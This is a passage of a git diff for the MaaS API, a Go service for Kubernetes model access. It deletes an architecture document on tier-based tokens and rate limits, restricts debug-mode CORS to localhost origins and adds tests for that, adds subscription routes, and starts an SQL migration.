-r) echo $MODELS | jq . MODEL_URL=$(echo $MODELS | jq -r '.data[0].url') @@ -270,7 +371,7 @@ MODEL_NAME=$(echo $MODELS | jq -r '.data[0].id') for i in {1..16} do curl -sSk -o /dev/null -w "%{http_code}\n" \ - -H "Authorization: Bearer $TOKEN" \ + -H "Authorization: Bearer ${API_KEY}" \ -d "{ \"model\": \"${MODEL_NAME}\", \"prompt\": \"Not really understood prompt\", diff --git a/maas-api/architecture.md b/maas-api/architecture.md deleted file mode 100644 index 368ff326f..000000000 --- a/maas-api/architecture.md +++ /dev/null @@ -1,611 +0,0 @@ -# MaaS API Architecture - -## Overview - -The MaaS (Models as a Service) API provides a tier-based token management system for accessing AI models through KServe. It integrates with OpenShift authentication, Kuadrant policies, and Gateway API to deliver multi-tenant access control, rate limiting, and usage metrics for LLM inference services. - -## Key Features - -- **Tier-Based Access Control**: Users are assigned to tiers (free, premium, enterprise) based on Kubernetes group membership -- **Short-Lived Token Issuance**: Self-service ephemeral tokens with configurable expiration -- **Rate & Token Limiting**: Per-tier request and token consumption limits -- **Model listing**: GET /v1/models lists models from **MaaSModelRef** CRs (when the MaaS controller is installed) or falls back to discovering KServe LLMInferenceServices. See [Model listing flow](../docs/content/configuration-and-management/model-listing-flow.md). 
-- **Usage Metrics**: Real-time telemetry with user, tier, and model tracking -- **Kubernetes-Native**: Leverages Service Accounts, RBAC, and TokenReview for authentication - -## Technology Stack - -- **Backend**: Go with Gin framework -- **Authentication**: Kubernetes TokenReview API + OpenShift OAuth -- **Authorization**: Kubernetes SubjectAccessReview (RBAC) -- **Gateway**: OpenShift Gateway API implementation -- **Policies**: Kuadrant (AuthPolicy, RateLimitPolicy, TokenRateLimitPolicy, TelemetryPolicy) -- **Model Serving**: KServe LLMInferenceServices -- **Metrics**: Prometheus via Limitador and TelemetryPolicy -- **Rate Limiting**: Limitador (part of Kuadrant) - -## API Endpoint Reference - -| Endpoint | Method | Purpose | Request Body | Response | -|-----------------------|--------|----------------------------------------------|-------------------|-----------------------------| -| `/health` | GET | Service health check | None | Health status | -| `/v1/models` | GET | List available models (from MaaSModelRef CRs or LLMInferenceServices) | None | OpenAI-compatible list | -| `/v1/api-keys` | POST | Create hash-based API key (sk-oai-*) | `{"name", "description", "expiresIn"}` | API key (shown once) | -| `/v1/api-keys` | GET | List all API keys for user | None | Array of API key metadata | -| `/v1/api-keys/{id}` | GET | Get specific API key by ID | None | API key metadata | -| `/v1/api-keys/{id}` | DELETE | Revoke specific API key | None | Revoked API key metadata (200 OK) | -| `/v1/tiers/lookup` | POST | Lookup tier for user groups (internal) | `{"groups"}` | `{"tier", "displayName"}` | -| `/internal/v1/api-keys/validate` | POST | Validate API key (Authorino callback) | `{"key"}` | `{"valid", "userId", "groups"}` | - -## Core Architecture Components - -### 1. 
MaaS API Service - -- **Language**: Go with Gin framework -- **Port**: 8080 -- **Service Account**: `maas-api` with cluster-wide permissions -- **Purpose**: Central API for token management and model discovery -- **Features**: - - Ephemeral token generation via Kubernetes Service Account TokenRequest API - - Tier-based namespace and Service Account management - - Model list from MaaSModelRef CRs only - - Health checks and CORS support (debug mode) - -**Key Components**: -- **Token Manager**: Creates/revokes Service Account tokens -- **Token Reviewer**: Validates tokens via Kubernetes TokenReview API -- **Tier Mapper**: Maps user groups to tiers using ConfigMap -- **Model listing**: Lists **MaaSModelRef** CRs (when the MaaS controller is installed) to build GET /v1/models; falls back to discovering LLMInferenceServices and probing each model endpoint if MaaSModelRef listing is not available. - -### 2. Kuadrant Policy Engine - -**Deployed Components**: -- **Authorino**: Authentication and authorization policy enforcement -- **Limitador**: Rate limiting and token counting engine -- **Kuadrant Operator**: Policy CRD management and synchronization - -**Policies Applied**: - -#### Gateway AuthPolicy - -- **Target**: `maas-default-gateway` (Gateway) -- **Authentication**: - - Service Account tokens (JWT format: `eyJ...`) via `kubernetesTokenReview` (legacy) - - Hash-based API keys (OpenAI format: `sk-oai-...`) via HTTP callback to `/internal/v1/api-keys/validate` -- **Metadata Enrichment**: Calls MaaS API `/v1/tiers/lookup` to determine user tier (cached for 300s) -- **Authorization**: - - API key validation (checks key is valid and not revoked) - - Kubernetes SubjectAccessReview for model access (checks user can POST to specific LLMInferenceService) -- **Identity Injection**: Adds `userid`, `tier`, and `keyId` to request context for downstream policies - -#### MaaS API AuthPolicy - -- **Target**: `maas-api-route` (HTTPRoute) -- **Authentication**: OpenShift user tokens 
via `kubernetesTokenReview` -- **Purpose**: Allows authenticated OpenShift users to issue tokens - -#### RateLimitPolicy - -- **Target**: `maas-default-gateway` (Gateway) -- **Limits by Tier**: - - Free: 5 requests per 2 minutes - - Premium: 20 requests per 2 minutes - - Enterprise: 50 requests per 2 minutes -- **Counter**: Per user (`auth.identity.userid`) - -#### TokenRateLimitPolicy - -- **Target**: `maas-default-gateway` (Gateway) -- **Limits by Tier** (tokens per minute): - - Free: 100 tokens/min - - Premium: 50,000 tokens/min - - Enterprise: 100,000 tokens/min -- **Counter**: Per user (`auth.identity.userid`) -- **Token Extraction**: Automatically reads `usage.total_tokens` from response body - -#### TelemetryPolicy - -- **Target**: `maas-default-gateway` (Gateway) -- **Metrics Labels**: - - `model`: Extracted from response body (`/model`) - - `tier`: From identity context - - `user`: From identity context -- **Purpose**: Export usage metrics to Prometheus via Limitador - -### 3. Gateway API and Routing - -Two gateways are deployed: - -1. **openshift-ai-inference**: - - Basic HTTP gateway for non-MaaS model access - - No authentication or rate limiting - - Allows direct access to models - -2. **maas-default-gateway**: - - Managed MaaS gateway with full policy enforcement - - Hostname: `maas.${CLUSTER_DOMAIN}` - - Listeners: HTTP (80) and HTTPS (443) - - Policies: Auth, RateLimit, TokenRateLimit, Telemetry - -**HTTPRoute for MaaS API**: -- `/v1/models` → `maas-api:8080` (OpenAI-compatible endpoint at root) -- `/maas-api/*` → `maas-api:8080` (with prefix rewrite to `/`) - -### 4. Tier Management - -The tier configuration defines three tiers with increasing levels of access: - -- **free** (level 0): Default for all authenticated users via `system:authenticated` group -- **premium** (level 1): For users in premium groups -- **enterprise** (level 2): Highest tier for enterprise/admin groups - -**Tier Resolution Logic**: -1. 
User groups are extracted from OpenShift token -2. Tiers are sorted by level (highest first) -3. First matching tier based on group membership wins -4. Service Account group (`system:serviceaccounts:`) is automatically added to tier groups - -**Tier Namespace Convention**: -- Format: `{instance-name}-tier-{tier-name}` -- Example: `maas-default-gateway-tier-free` -- Namespaces are created automatically when first token is issued - -### 5. KServe Model Services - -**Supported CRDs**: -- **LLMInferenceService** (`serving.kserve.io/v1alpha1`) - -**Model Discovery**: -- Queries all namespaces for LLMInferenceServices -- Extracts model ID from `spec.model.name` or falls back to `metadata.name` -- Checks readiness via status conditions -- Returns OpenAI-compatible model list with URL and ready status - -**Model URL Resolution**: -1. Primary: `status.url` -2. Fallback: First URL in `status.addresses[]` - -### 6. Token Lifecycle - -**Service Account-Based Token Architecture**: - -The system uses Kubernetes Service Account tokens as the primary authentication mechanism. Each user gets a dedicated Service Account in their tier namespace. - -## Token Issuance Workflow - -```mermaid -sequenceDiagram - participant User - participant Gateway as Gateway API - participant Authorino - participant MaaS as MaaS API - participant TierMapper as Tier Mapper - participant K8s as Kubernetes API - - User->>Gateway: POST /maas-api/v1/tokens
Authorization: Bearer {openshift-token} - Gateway->>Authorino: Enforce MaaS API AuthPolicy - Authorino->>K8s: TokenReview (validate OpenShift token) - K8s-->>Authorino: User identity (username, groups) - Authorino->>Gateway: Authenticated - Gateway->>MaaS: Forward request with user context - - Note over MaaS,TierMapper: Determine User Tier - MaaS->>TierMapper: GetTierForGroups(user.groups) - TierMapper->>K8s: Get ConfigMap(tier-to-group-mapping) - K8s-->>TierMapper: Tier configuration - TierMapper-->>MaaS: User tier (e.g., "premium") - - Note over MaaS,K8s: Ensure Tier Resources - MaaS->>K8s: Create Namespace({instance}-tier-{tier}) if needed - MaaS->>K8s: Create ServiceAccount({username-hash}) if needed - - Note over MaaS,K8s: Generate Token - MaaS->>K8s: CreateToken(namespace, SA name, TTL) - K8s-->>MaaS: TokenRequest with token and expiration - - MaaS-->>User: {
"token": "...",
"expiration": "4h",
"expiresAt": 1234567890
} -``` - -### Token Issuance Details - -**Step 1: Authentication** -- User authenticates with OpenShift token (`oc whoami -t`) -- MaaS API AuthPolicy validates token via Kubernetes TokenReview -- User context (username, groups, UID) is extracted - -**Step 2: Tier Determination** -- User groups are matched against tier configuration -- Highest level tier wins (enterprise > premium > free) -- Projected Service Account group is added: `system:serviceaccounts:{tier-namespace}` - -**Step 3: Resource Provisioning** -- Tier namespace is created if missing: `{instance}-tier-{tier}` -- Service Account is created if missing: `{username-sanitized}-{hash}` - - Username sanitization: lowercase, replace invalid chars with `-`, max 63 chars - - Hash suffix prevents collisions (first 8 chars of SHA1) -- Labels applied for tracking tier and instance association - -**Step 4: Token Generation** -- Uses Kubernetes TokenRequest API (`ServiceAccounts().CreateToken()`) -- Audience: `{instance}-sa` -- TTL: User-specified (default: 4 hours) -- Returns token, expiration duration, and Unix timestamp - -### Token Revocation Workflow - -```mermaid -sequenceDiagram - participant User - participant Gateway as Gateway API - participant Authorino - participant MaaS as MaaS API - participant K8s as Kubernetes API - - User->>Gateway: DELETE /maas-api/v1/tokens
Authorization: Bearer {openshift-token} - Gateway->>Authorino: Enforce MaaS API AuthPolicy - Authorino->>K8s: TokenReview (validate OpenShift token) - K8s-->>Authorino: User identity - Authorino->>Gateway: Authenticated - Gateway->>MaaS: Forward request with user context - - Note over MaaS,K8s: Revoke All Tokens - MaaS->>K8s: Delete ServiceAccount({username-hash}) - MaaS->>K8s: Recreate ServiceAccount({username-hash}) - - Note right of K8s: All existing tokens
are invalidated - - MaaS-->>User: 204 No Content -``` - -**Revocation Mechanism**: -- Kubernetes doesn't support individual token revocation -- Solution: Delete and recreate the Service Account -- All tokens issued from that Service Account become invalid immediately -- New Service Account can immediately issue new tokens - -## Model Access Workflow - -```mermaid -sequenceDiagram - participant User - participant Gateway as Gateway API - participant Authorino - participant MaaS as MaaS API - participant Limitador - participant Model as KServe Model - - Note over User: 1. Obtain Token - User->>Gateway: POST /maas-api/v1/tokens
Authorization: Bearer {openshift-token} - Gateway->>MaaS: Route to MaaS API - MaaS-->>User: {token: "...", expiration: "4h"} - - Note over User: 2. Access Model - User->>Gateway: POST /{namespace}/{model}/v1/chat/completions
Authorization: Bearer {sa-token} - - Note over Gateway,Authorino: Gateway AuthPolicy Enforcement - Gateway->>Authorino: Validate request - Authorino->>Authorino: TokenReview (validate SA token) - Authorino->>MaaS: POST /v1/tiers/lookup
{groups: [...]} - MaaS-->>Authorino: {tier: "premium"} - Authorino->>Authorino: SubjectAccessReview
(check RBAC for model access) - Authorino->>Authorino: Inject identity context:
{userid: "user", tier: "premium"} - Authorino-->>Gateway: Authorized - - Note over Gateway,Limitador: Rate Limiting - Gateway->>Limitador: Check RateLimit (premium: 20/2m) - Limitador-->>Gateway: Allowed - Gateway->>Limitador: Check TokenRateLimit (premium: 50k/min) - Limitador-->>Gateway: Allowed - - Gateway->>Model: Forward request - Model-->>Gateway: Response {usage: {total_tokens: 150}} - - Note over Gateway,Limitador: Record Usage - Gateway->>Limitador: Record 150 tokens for user - Gateway->>Limitador: Export metrics:
{user, tier, model} - - Gateway-->>User: Model response -``` - -### Model Access Details - -**Step 1: Token-Based Authentication** -- Gateway extracts Bearer token from Authorization header -- Authorino performs TokenReview to validate Service Account token -- Token audience is checked: `maas-default-gateway-sa` -- User ID is normalized from full SA name: `system:serviceaccount:{ns}:{name}` → `{name}` - -**Step 2: Tier Lookup with Caching** -- Authorino calls MaaS API: `POST /v1/tiers/lookup` with user groups -- User groups include the tier-specific SA group: `system:serviceaccounts:{tier-namespace}` -- Response is cached for 300 seconds (5 minutes) per username -- Tier is added to identity metadata: `auth.identity.tier` - -**Step 3: Authorization via RBAC** -- Authorino performs Kubernetes SubjectAccessReview -- Checks if user can POST to specific LLMInferenceService -- Resource attributes: - - Group: `serving.kserve.io` - - Resource: `llminferenceservices` - - Namespace: Extracted from request path (`/{namespace}/{model}/...`) - - Name: Extracted from request path - - Verb: `post` - -**Step 4: Rate Limiting** -- Limitador checks request count against tier limit -- Counter key: `auth.identity.userid` -- Returns 429 if limit exceeded - -**Step 5: Token Rate Limiting** -- Pre-checks estimated token usage (if available) -- Actual token usage is recorded from response body: `usage.total_tokens` -- Counter key: `auth.identity.userid` -- Returns 429 if token limit exceeded - -**Step 6: Telemetry Export** -- Limitador exports metrics with labels: - - `model`: Extracted from response body JSON (`/model`) - - `tier`: From auth identity context - - `user`: From auth identity context -- Metrics available in Prometheus format at Limitador metrics endpoint - -## Detailed Component Workflows - -### Tier Lookup Endpoint - -**Purpose**: Internal API for Gateway AuthPolicy to determine user tier - -**Endpoint**: `POST /v1/tiers/lookup` - -**Request**: -```json -{ - "groups": [ - 
"system:serviceaccounts:maas-default-gateway-tier-premium", - "system:authenticated", - "premium-group" - ] -} -``` - -**Response**: -```json -{ - "tier": "premium", - "displayName": "Premium Tier" -} -``` - -**Implementation**: -1. Receive user groups in request body -2. Load tier configuration from ConfigMap `tier-to-group-mapping` -3. Sort tiers by level (highest first) -4. Find first tier containing any of the user groups -5. Return tier info (name and displayName) or 404 if no match - -**Error Handling**: -- 400: Invalid request body -- 404: No tier found for any group -- 500: Failed to load tier configuration - -### Model listing (GET /v1/models) - -**Endpoint**: `GET /v1/models` — Returns an OpenAI-compatible list of available models. - -**Primary flow (MaaSModelRef)** -When the MaaS controller is installed and the API can list **MaaSModelRef** CRs (maas.opendatahub.io) in its namespace: - -1. The API lists all MaaSModelRef resources in the configured namespace. -2. For each MaaSModelRef it maps: **id** = `metadata.name`, **url** = `status.endpoint`, **ready** = (`status.phase == "Ready"`), plus **created** / **owned_by** from metadata. -3. No per-model HTTP calls are made; the controller has already reconciled status from the underlying LLMInferenceService and HTTPRoute. - -If the MaaSModelRef lister is not configured or listing fails, the API returns an empty list or an error. See [Model listing flow](../docs/content/configuration-and-management/model-listing-flow.md) for details. 
- -**Response format** (OpenAI-compatible): -```json -{ - "object": "list", - "data": [ - { - "id": "facebook-opt-125m-simulated", - "object": "model", - "created": 1703001234, - "owned_by": "opendatahub", - "url": "https://maas.example.com/llm/facebook-opt-125m-simulated", - "ready": true - } - ] -} -``` - -### Service Account Name Sanitization - -**Problem**: Kubernetes usernames can contain characters invalid for Service Account names - -**Examples**: -- Email: `user@example.com` (contains `@`, `.`) -- LDAP DN: `CN=User,OU=Users,DC=example,DC=com` (contains `=`, `,`) - -**Sanitization Algorithm**: -1. Convert to lowercase -2. Replace all invalid characters (`[^a-z0-9-]`) with `-` -3. Collapse consecutive dashes to single dash -4. Trim leading/trailing dashes -5. Append 8-character SHA1 hash of original username (collision prevention) -6. Truncate to 63 characters total (Kubernetes limit) - -**Examples**: -- `user@example.com` → `user-example-com-a1b2c3d4` -- `CN=User,OU=Users` → `cn-user-ou-users-e5f6g7h8` - -## Security Considerations - -### Authentication Security - -1. **Two-Stage Authentication**: - - Stage 1: OpenShift token validates user identity (for token issuance) - - Stage 2: Service Account token authenticates model access - -2. **Token Scoping**: - - Service Account tokens are scoped to specific audience: `{instance}-sa` - - Tokens cannot be used outside the MaaS gateway context - -3. **Short-Lived Tokens**: - - Default: 4 hours - - Configurable per request - - Automatic expiration enforced by Kubernetes - -4. **Revocation**: - - All user tokens can be revoked via Service Account recreation - - No persistent token storage (stateless) - -### Authorization Security - -1. **Kubernetes RBAC Integration**: - - Model access requires Kubernetes RBAC permissions - - Fine-grained control per namespace and model name - -2. 
**Tier-Based Isolation**: - - Each tier has dedicated namespace - - Service Accounts cannot cross tier boundaries - - Network policies can further isolate tiers - -3. **Identity Propagation**: - - User identity is preserved through all policy layers - - Authorino injects normalized user ID into request context - -### Rate Limiting Security - -1. **Multi-Level Protection**: - - Request-based limits prevent API abuse - - Token-based limits prevent cost-based attacks - -2. **Per-User Accounting**: - - Limits enforced per user ID (from Service Account name) - - Prevents shared token abuse - -3. **Tier Enforcement**: - - Limits cannot be bypassed by switching tokens - - Tier is re-evaluated on each request via cached lookup - -## Metrics and Observability - -### Available Metrics - -**Source**: Limitador (exposed on port 8080 at `/metrics`) - -**Metric Types**: -1. **Request Counters**: - - `authorized_calls` - Number of requests allowed (not rate-limited) - - `limited_calls` - Number of requests denied due to rate limiting - - Labels: `user`, `tier`, `model`, `limitador_namespace` - -2. **Token Counters**: - - `authorized_hits` - Total tokens consumed (extracted from `usage.total_tokens` in model responses) - - Labels: `user`, `tier`, `model`, `limitador_namespace` - -3. 
**Labels via TelemetryPolicy**: - - `user`: User identifier (extracted from `auth.identity.userid`) - - `tier`: User tier (extracted from `auth.identity.tier`) - - `model`: Model name (extracted from request path) - -### Monitoring Setup - -**Prometheus ServiceMonitor**: -- Scrapes Limitador metrics endpoint -- Interval: 30 seconds -- Labels for Grafana dashboards - -**Access Metrics**: -```bash -# Port-forward Limitador -kubectl port-forward -n kuadrant-system svc/limitador-limitador 8080:8080 - -# Query metrics -curl http://localhost:8080/metrics | grep -E '(authorized_hits|authorized_calls|limited_calls)' -``` - -## Deployment Architecture - -### Namespace Organization - -``` -openshift-ingress/ -├── Gateway: maas-default-gateway -├── Gateway: openshift-ai-inference -├── AuthPolicy: gateway-auth-policy -├── RateLimitPolicy: gateway-rate-limits -├── TokenRateLimitPolicy (gateway-level) -└── TelemetryPolicy: user-group - -maas-api/ -├── Deployment: maas-api -├── Service: maas-api -├── ServiceAccount: maas-api (with cluster permissions) -├── HTTPRoute: maas-api-route -├── AuthPolicy: maas-api-auth-policy -└── ConfigMap: tier-to-group-mapping - -kuadrant-system/ -├── Deployment: authorino -├── Deployment: limitador -└── Deployment: kuadrant-operator - -{instance}-tier-free/ (created dynamically) -├── ServiceAccount: user1-a1b2c3d4 -├── ServiceAccount: user2-e5f6g7h8 -└── ... 
- -{instance}-tier-premium/ (created dynamically) -└── ServiceAccount: user3-i9j0k1l2 - -{instance}-tier-enterprise/ (created dynamically) -└── ServiceAccount: admin1-m3n4o5p6 -``` - -### RBAC Requirements - -**MaaS API Service Account Permissions**: - -The MaaS API requires cluster-level permissions for: -- **Token management**: Create, list, get, and delete Service Accounts and Service Account tokens -- **Namespace management**: Create, list, get namespaces for tier isolation -- **Authentication**: Create TokenReviews to validate user tokens -- **Model discovery**: List and get LLMInferenceServices across all namespaces -- **Tier configuration**: Read ConfigMaps for tier-to-group mapping - -**User Model Access RBAC**: - -Users access models through their tier-specific Service Account. Access is granted via RoleBindings that bind tier groups to roles with POST permissions on LLMInferenceService resources. - -Example tier-based access pattern: -- Subject: Group `system:serviceaccounts:maas-default-gateway-tier-premium` -- Namespace: `models-namespace` -- Resource: `llminferenceservices.serving.kserve.io` -- Verb: `post` - -## Configuration Reference - -### Environment Variables - -**MaaS API Deployment**: -- `NAMESPACE`: Namespace where MaaS API is deployed (from fieldRef) -- `PORT`: HTTP server port (default: `8080`) -- `DEBUG_MODE`: Enable CORS and debug logging (default: `false`) - -### Tier Configuration - -**ConfigMap**: `tier-to-group-mapping` (namespace: `maas-api`) - -The tier configuration uses a list structure with the following fields per tier: - -**Tier Fields**: -- `name`: Tier identifier (used in namespace naming and policy matching) -- `displayName`: Optional UI-friendly label (falls back to `name` if not set) -- `level`: Priority integer (higher wins in case of multiple group matches) -- `groups`: Array of Kubernetes groups that belong to this tier - -**Special Groups**: -- `system:authenticated`: Default group for all authenticated users (typically 
assigned to free tier) -- `system:serviceaccounts:{tier-namespace}`: Automatically added for each tier to enable tier-based routing - diff --git a/maas-api/cmd/cors_test.go b/maas-api/cmd/cors_test.go new file mode 100644 index 000000000..db2e3012b --- /dev/null +++ b/maas-api/cmd/cors_test.go @@ -0,0 +1,175 @@ +package main + +import ( + "net/http" + "net/http/httptest" + "testing" + + "github.com/gin-contrib/cors" + "github.com/gin-gonic/gin" + "github.com/stretchr/testify/assert" +) + +func TestIsLocalhostOrigin(t *testing.T) { + tests := []struct { + name string + origin string + want bool + }{ + {name: "http localhost with port", origin: "http://localhost:3000", want: true}, + {name: "https localhost with port", origin: "https://localhost:8443", want: true}, + {name: "http 127.0.0.1 with port", origin: "http://127.0.0.1:8080", want: true}, + {name: "https 127.0.0.1 with port", origin: "https://127.0.0.1:443", want: true}, + {name: "http localhost default port", origin: "http://localhost", want: true}, + {name: "https localhost default port", origin: "https://localhost", want: true}, + {name: "http 127.0.0.1 default port", origin: "http://127.0.0.1", want: true}, + {name: "https 127.0.0.1 default port", origin: "https://127.0.0.1", want: true}, + {name: "loopback range 127.0.0.2", origin: "http://127.0.0.2:8080", want: true}, + {name: "loopback range 127.255.255.254", origin: "http://127.255.255.254:9090", want: true}, + + {name: "external origin", origin: "https://external.com", want: false}, + {name: "external with localhost in path", origin: "https://external.com/localhost:3000", want: false}, + {name: "localhost without scheme", origin: "localhost:3000", want: false}, + {name: "subdomain of localhost", origin: "http://foo.localhost:3000", want: false}, + {name: "non-loopback IP", origin: "http://192.168.1.1:8080", want: false}, + {name: "ftp scheme localhost", origin: "ftp://localhost", want: false}, + {name: "empty string", origin: "", want: false}, + } + 
+ for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + assert.Equal(t, tt.want, isLocalhostOrigin(tt.origin)) + }) + } +} + +func newCORSTestRouter(useCORS bool) *gin.Engine { + gin.SetMode(gin.TestMode) + router := gin.New() + if useCORS { + router.Use(cors.New(debugCORSConfig())) + } + router.OPTIONS("/*path", func(c *gin.Context) { c.Status(http.StatusNoContent) }) + router.GET("/test", func(c *gin.Context) { c.String(http.StatusOK, "ok") }) + return router +} + +func TestDebugCORS_AllowsLocalhostOrigin(t *testing.T) { + router := newCORSTestRouter(true) + + origins := []string{ + "http://localhost:3000", + "https://localhost:8443", + "http://127.0.0.1:8080", + "https://127.0.0.1:443", + "http://localhost", + "https://localhost", + "http://127.0.0.1", + "https://127.0.0.1", + } + + for _, origin := range origins { + t.Run(origin, func(t *testing.T) { + req := httptest.NewRequest(http.MethodGet, "/test", nil) + req.Header.Set("Origin", origin) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Equal(t, http.StatusOK, w.Code) + assert.Equal(t, origin, w.Header().Get("Access-Control-Allow-Origin"), + "expected CORS to allow localhost origin") + }) + } +} + +func TestDebugCORS_RejectsExternalOrigin(t *testing.T) { + router := newCORSTestRouter(true) + + origins := []string{ + "https://external.com", + "https://attacker.example.org", + "http://not-localhost:3000", + "http://192.168.1.1:8080", + } + + for _, origin := range origins { + t.Run(origin, func(t *testing.T) { + req := httptest.NewRequest(http.MethodGet, "/test", nil) + req.Header.Set("Origin", origin) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Equal(t, http.StatusForbidden, w.Code, + "cross-origin request from non-localhost should be rejected") + assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"), + "expected CORS to reject non-localhost origin") + }) + } +} + +func TestDebugCORS_PreflightAllowsLocalhostOrigin(t *testing.T) { + router := 
newCORSTestRouter(true) + + req := httptest.NewRequest(http.MethodOptions, "/test", nil) + req.Header.Set("Origin", "http://localhost:3000") + req.Header.Set("Access-Control-Request-Method", "POST") + req.Header.Set("Access-Control-Request-Headers", "Authorization") + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Equal(t, http.StatusNoContent, w.Code) + assert.Equal(t, "http://localhost:3000", w.Header().Get("Access-Control-Allow-Origin")) + assert.Contains(t, w.Header().Get("Access-Control-Allow-Methods"), "POST") + assert.Contains(t, w.Header().Get("Access-Control-Allow-Headers"), "Authorization") +} + +func TestDebugCORS_PreflightRejectsExternalOrigin(t *testing.T) { + router := newCORSTestRouter(true) + + req := httptest.NewRequest(http.MethodOptions, "/test", nil) + req.Header.Set("Origin", "https://external.com") + req.Header.Set("Access-Control-Request-Method", "POST") + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"), + "preflight should not return CORS headers for external origin") +} + +func TestDebugCORS_CredentialsNotAllowed(t *testing.T) { + router := newCORSTestRouter(true) + + req := httptest.NewRequest(http.MethodGet, "/test", nil) + req.Header.Set("Origin", "http://localhost:3000") + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Empty(t, w.Header().Get("Access-Control-Allow-Credentials"), + "credentials should not be allowed — API uses Bearer tokens, not cookies") +} + +func TestDebugCORS_SameOriginRequestPassesThrough(t *testing.T) { + router := newCORSTestRouter(true) + + req := httptest.NewRequest(http.MethodGet, "/test", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Equal(t, http.StatusOK, w.Code, + "same-origin request (no Origin header) must not be blocked by CORS middleware") + assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"), + "no CORS headers expected for same-origin request") +} + +func 
TestNoCORS_WhenDebugModeDisabled(t *testing.T) { + router := newCORSTestRouter(false) + + req := httptest.NewRequest(http.MethodGet, "/test", nil) + req.Header.Set("Origin", "http://localhost:3000") + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + assert.Equal(t, http.StatusOK, w.Code) + assert.Empty(t, w.Header().Get("Access-Control-Allow-Origin"), + "CORS headers should not be present when debug mode is off") +} diff --git a/maas-api/cmd/main.go b/maas-api/cmd/main.go index be0ca22ca..466c26b43 100644 --- a/maas-api/cmd/main.go +++ b/maas-api/cmd/main.go @@ -5,7 +5,9 @@ import ( "errors" "flag" "fmt" + "net" "net/http" + "net/url" "os" "os/signal" "syscall" @@ -50,7 +52,7 @@ func serve() error { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - cluster, err := config.NewClusterConfig(cfg.Namespace, constant.DefaultResyncPeriod) + cluster, err := config.NewClusterConfig(cfg.Namespace, cfg.MaaSSubscriptionNamespace, constant.DefaultResyncPeriod) if err != nil { return fmt.Errorf("failed to create cluster config: %w", err) } @@ -72,16 +74,8 @@ func serve() error { router := gin.Default() if cfg.DebugMode { - router.Use(cors.New(cors.Config{ - AllowMethods: []string{"GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"}, - AllowHeaders: []string{"Authorization", "Content-Type", "Accept"}, - ExposeHeaders: []string{"Content-Type"}, - AllowOriginFunc: func(origin string) bool { - return true - }, - AllowCredentials: true, - MaxAge: 12 * time.Hour, - })) + log.Warn("Debug CORS policy active: allowing localhost origins only") + router.Use(cors.New(debugCORSConfig())) } router.OPTIONS("/*path", func(c *gin.Context) { c.Status(204) }) @@ -157,7 +151,6 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin v1Routes.POST("/tiers/lookup", tier.NewHandler(tierMapper).TierLookup) subscriptionSelector := subscription.NewSelector(log, cluster.MaaSSubscriptionLister) - v1Routes.POST("/subscriptions/select", 
subscription.NewHandler(log, subscriptionSelector).SelectSubscription) modelManager, err := models.NewManager(log) if err != nil { @@ -165,14 +158,18 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin } tokenHandler := token.NewHandler(log, cfg.Name) + modelsHandler := handlers.NewModelsHandler(log, modelManager, subscriptionSelector, cluster.MaaSModelRefLister) + subscriptionHandler := subscription.NewHandler(log, subscriptionSelector) - modelsHandler := handlers.NewModelsHandler(log, modelManager, subscriptionSelector, cluster.MaaSModelRefLister, cfg.Namespace) - - apiKeyService := api_keys.NewServiceWithLogger(store, cfg, log) + apiKeyService := api_keys.NewServiceWithLogger(store, cfg, subscriptionSelector, log) apiKeyHandler := api_keys.NewHandler(log, apiKeyService, cluster.AdminChecker) v1Routes.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + // Subscription listing routes + v1Routes.GET("/subscriptions", tokenHandler.ExtractUserInfo(), subscriptionHandler.ListSubscriptions) + v1Routes.GET("/model/:model-id/subscriptions", tokenHandler.ExtractUserInfo(), subscriptionHandler.ListSubscriptionsForModel) + // API Key routes - Complete CRUD for hash-based key architecture apiKeyRoutes := v1Routes.Group("/api-keys", tokenHandler.ExtractUserInfo()) apiKeyRoutes.POST("", apiKeyHandler.CreateAPIKey) // Create hash-based key @@ -184,6 +181,36 @@ func registerHandlers(ctx context.Context, log *logger.Logger, router *gin.Engin // Internal routes for Authorino HTTP callback (no auth required - called by Authorino) internalRoutes := router.Group("/internal/v1") internalRoutes.POST("/api-keys/validate", apiKeyHandler.ValidateAPIKeyHandler) + internalRoutes.POST("/subscriptions/select", subscriptionHandler.SelectSubscription) return nil } + +// isLocalhostOrigin reports whether the origin is a localhost address, +// used by the debug-mode CORS policy to restrict cross-origin access to +// local development only. 
Accepts both ported (http://localhost:3000) +// and default-port (http://localhost) forms. +func isLocalhostOrigin(origin string) bool { + u, err := url.Parse(origin) + if err != nil { + return false + } + if u.Scheme != "http" && u.Scheme != "https" { + return false + } + if u.Hostname() == "localhost" { + return true + } + ip := net.ParseIP(u.Hostname()) + return ip != nil && ip.IsLoopback() +} + +func debugCORSConfig() cors.Config { + return cors.Config{ + AllowMethods: []string{"GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"}, + AllowHeaders: []string{"Authorization", "Content-Type", "Accept"}, + ExposeHeaders: []string{"Content-Type"}, + AllowOriginFunc: isLocalhostOrigin, + MaxAge: 12 * time.Hour, + } +} diff --git a/maas-api/db/schema/0002_add_ephemeral_column.up.sql b/maas-api/db/schema/0002_add_ephemeral_column.up.sql new file mode 100644 index 000000000..32f07031d --- /dev/null +++ b/maas-api/db/schema/0002_add_ephemeral_column.up.sql @@ -0,0 +1,12 @@ +-- Schema for API Key Management: 0002_add_ephemeral_column.up.sql +-- Description: Add ephemeral column for short-lived programmatic keys + +-- Add ephemeral column to api_keys table (idempotent) +ALTER TABLE api_keys ADD COLUMN IF NOT EXISTS ephemeral BOOLEAN NOT NULL DEFAULT FALSE; + +-- Index for cleanup job: find expired ephemeral keys 